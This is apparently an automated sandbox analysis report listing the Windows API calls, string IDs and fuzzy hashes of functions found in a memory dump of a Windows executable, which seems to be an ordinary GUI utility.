                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4284152360-0
                                                                                                                                                                • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                • String ID: d=E
                                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                                • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                                • String ID: "
                                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                                • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                • String ID: URL
                                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                                • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                                • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                • memset.MSVCRT ref: 00401917
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                                • String ID: WinPos
                                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                                • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                                • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                • API String ID: 2773794195-880857682
                                                                                                                                                                • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongWindow
                                                                                                                                                                • String ID: MZ@
                                                                                                                                                                • API String ID: 1378638983-2978689999
                                                                                                                                                                • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
